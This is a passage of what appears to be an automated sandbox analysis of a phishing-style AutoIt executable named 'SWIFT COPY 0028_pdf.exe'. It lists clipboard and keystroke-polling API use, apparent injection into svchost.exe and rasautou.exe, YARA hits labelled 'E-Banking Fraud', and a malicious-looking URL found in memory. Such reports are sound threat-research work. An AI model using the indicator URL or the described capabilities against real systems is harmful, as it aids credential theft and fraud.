                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005976000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003796000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00976B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00976B0C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00976D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00976D07
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00962B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_00962B37
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0098F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0098F7FF

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00923D19
                Source: SWIFT COPY 0028_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000000.2136017307.00000000009CE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_ca2ffd59-d
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000000.2136017307.00000000009CE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_47e9354c-b
                Source: SWIFT COPY 0028_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_31e6e413-e
                Source: SWIFT COPY 0028_pdf.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3b925906-f
                Source: initial sample | Static PE information: Filename: SWIFT COPY 0028_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CDE3 NtClose | 2_2_0042CDE3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk | 2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk | 2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk | 2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk | 2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74340 NtSetContextThread | 2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74650 NtSuspendThread | 2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BE0 NtQueryValueKey | 2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BF0 NtAllocateVirtualMemory | 2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B80 NtQueryInformationFile | 2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BA0 NtEnumerateValueKey | 2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AD0 NtReadFile | 2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AF0 NtWriteFile | 2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AB0 NtWaitForSingleObject | 2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FE0 NtCreateFile | 2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F90 NtProtectVirtualMemory | 2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FA0 NtQuerySection | 2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FB0 NtResumeThread | 2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F60 NtCreateProcessEx | 2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F30 NtCreateSection | 2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EE0 NtQueueApcThread | 2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E80 NtReadVirtualMemory | 2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken | 2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E30 NtWriteVirtualMemory | 2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DD0 NtDelayExecution | 2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DB0 NtEnumerateKey | 2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D00 NtSetInformationFile | 2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D10 NtMapViewOfSection | 2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D30 NtUnmapViewOfSection | 2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CC0 NtQueryVirtualMemory | 2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CF0 NtOpenProcess | 2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CA0 NtQueryInformationToken | 2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C60 NtCreateKey | 2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C00 NtQueryInformationProcess | 2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73090 NtSetValueKey | 2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73010 NtOpenDirectoryObject | 2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C739B0 NtGetContextThread | 2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D70 NtOpenThread | 2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D10 NtOpenProcessToken | 2_2_03C73D10
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E44650 NtSuspendThread,LdrInitializeThunk | 4_2_04E44650
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E44340 NtSetContextThread,LdrInitializeThunk | 4_2_04E44340
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42CA0 NtQueryInformationToken,LdrInitializeThunk | 4_2_04E42CA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42C60 NtCreateKey,LdrInitializeThunk | 4_2_04E42C60
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_04E42C70
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_04E42DF0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42DD0 NtDelayExecution,LdrInitializeThunk | 4_2_04E42DD0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42D30 NtUnmapViewOfSection,LdrInitializeThunk | 4_2_04E42D30
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42D10 NtMapViewOfSection,LdrInitializeThunk | 4_2_04E42D10
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42EE0 NtQueueApcThread,LdrInitializeThunk | 4_2_04E42EE0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42E80 NtReadVirtualMemory,LdrInitializeThunk | 4_2_04E42E80
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42FE0 NtCreateFile,LdrInitializeThunk | 4_2_04E42FE0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42FB0 NtResumeThread,LdrInitializeThunk | 4_2_04E42FB0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42F30 NtCreateSection,LdrInitializeThunk | 4_2_04E42F30
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42AF0 NtWriteFile,LdrInitializeThunk | 4_2_04E42AF0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42AD0 NtReadFile,LdrInitializeThunk | 4_2_04E42AD0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42BE0 NtQueryValueKey,LdrInitializeThunk | 4_2_04E42BE0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 4_2_04E42BF0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42BA0 NtEnumerateValueKey,LdrInitializeThunk | 4_2_04E42BA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42B60 NtClose,LdrInitializeThunk | 4_2_04E42B60
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E435C0 NtCreateMutant,LdrInitializeThunk | 4_2_04E435C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E439B0 NtGetContextThread,LdrInitializeThunk | 4_2_04E439B0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42CF0 NtOpenProcess | 4_2_04E42CF0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42CC0 NtQueryVirtualMemory | 4_2_04E42CC0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42C00 NtQueryInformationProcess | 4_2_04E42C00
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42DB0 NtEnumerateKey | 4_2_04E42DB0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42D00 NtSetInformationFile | 4_2_04E42D00
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42EA0 NtAdjustPrivilegesToken | 4_2_04E42EA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42E30 NtWriteVirtualMemory | 4_2_04E42E30
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42FA0 NtQuerySection | 4_2_04E42FA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42F90 NtProtectVirtualMemory | 4_2_04E42F90
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42F60 NtCreateProcessEx | 4_2_04E42F60
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42AB0 NtWaitForSingleObject | 4_2_04E42AB0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E42B80 NtQueryInformationFile | 4_2_04E42B80
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E43090 NtSetValueKey | 4_2_04E43090
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E43010 NtOpenDirectoryObject | 4_2_04E43010
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E43D70 NtOpenThread | 4_2_04E43D70
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E43D10 NtOpenProcessToken | 4_2_04E43D10
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E79A60 NtDeleteFile | 4_2_02E79A60
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E79B00 NtClose | 4_2_02E79B00
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E79800 NtCreateFile | 4_2_02E79800
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E79970 NtReadFile | 4_2_02E79970
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E79C60 NtAllocateVirtualMemory | 4_2_02E79C60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00966685: CreateFileW,DeviceIoControl,CloseHandle | 0_2_00966685
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_0095ACC5
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_009679D3
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0094B043 | 0_2_0094B043
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00933200 | 0_2_00933200
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00933B70 | 0_2_00933B70
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095410F | 0_2_0095410F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009402A4 | 0_2_009402A4
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095038E | 0_2_0095038E
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0092E3B0 | 0_2_0092E3B0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009406D9 | 0_2_009406D9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095467F | 0_2_0095467F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0098AACE | 0_2_0098AACE
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00954BEF | 0_2_00954BEF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0094CCC1 | 0_2_0094CCC1
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00926F07 | 0_2_00926F07
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0092AF50 | 0_2_0092AF50
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009831BC | 0_2_009831BC
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0094D1B9 | 0_2_0094D1B9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093B11F | 0_2_0093B11F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0094123A | 0_2_0094123A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095724D | 0_2_0095724D
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009613CA | 0_2_009613CA
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009293F0 | 0_2_009293F0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093F563 | 0_2_0093F563
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009296C0 | 0_2_009296C0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096B6CC | 0_2_0096B6CC
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009277B0 | 0_2_009277B0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0098F7FF | 0_2_0098F7FF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009579C9 | 0_2_009579C9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093FA57 | 0_2_0093FA57
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00929B60 | 0_2_00929B60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00927D19 | 0_2_00927D19
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00949ED0 | 0_2_00949ED0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093FE6F | 0_2_0093FE6F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00927FA3 | 0_2_00927FA3
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_010284F8 | 0_2_010284F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C93 | 2_2_00418C93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403060 | 2_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010E0 | 2_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004022C0 | 2_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004022BA | 2_2_004022BA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004013B0 | 2_2_004013B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042F423 | 2_2_0042F423
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402428 | 2_2_00402428
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402430 | 2_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004104A3 | 2_2_004104A3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004106C3 | 2_2_004106C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026F6 | 2_2_004026F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416E8F | 2_2_00416E8F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416E93 | 2_2_00416E93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E743 | 2_2_0040E743
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402700 | 2_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0 | 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D003E6 | 2_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA352 | 2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC02C0 | 2_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0274 | 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF81CC | 2_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF41A2 | 2_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D001AA | 2_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC8158 | 2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30100 | 2_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDA118 | 2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD2000 | 2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3C7C0 | 2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64750 | 2_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40770 | 2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5C6E0 | 2_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D00591 | 2_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 | 2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEE4F6 | 2_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF2446 | 2_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4420 | 2_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF6BD7 | 2_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40 | 2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0A9A6 | 2_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 | 2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E8F0 | 2_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C268B8 | 2_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4A840 | 2_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840 | 2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C32FC8 | 2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4CFE0 | 2_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBEFA0 | 2_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB4F40 | 2_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C82F28 | 2_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60F30 | 2_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE2F30 | 2_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEEDB | 2_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C52E90 | 2_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFCE93 | 2_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40E59 | 2_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEE26 | 2_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3ADE0 | 2_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C58DBF | 2_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4AD00 | 2_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDCD1F | 2_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30CF2 | 2_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0CB5 | 2_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40C00 | 2_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C8739A | 2_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2D34C | 2_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF132D | 2_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5B2C0 | 2_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE12ED | 2_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C452A0 | 2_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4B1B0 | 2_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7516C | 2_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2F172 | 2_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0B16B | 2_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEF0CC | 2_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C470C0 | 2_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF70E9 | 2_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFF0E0 | 2_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFF7B0 | 2_2_03CFF7B0
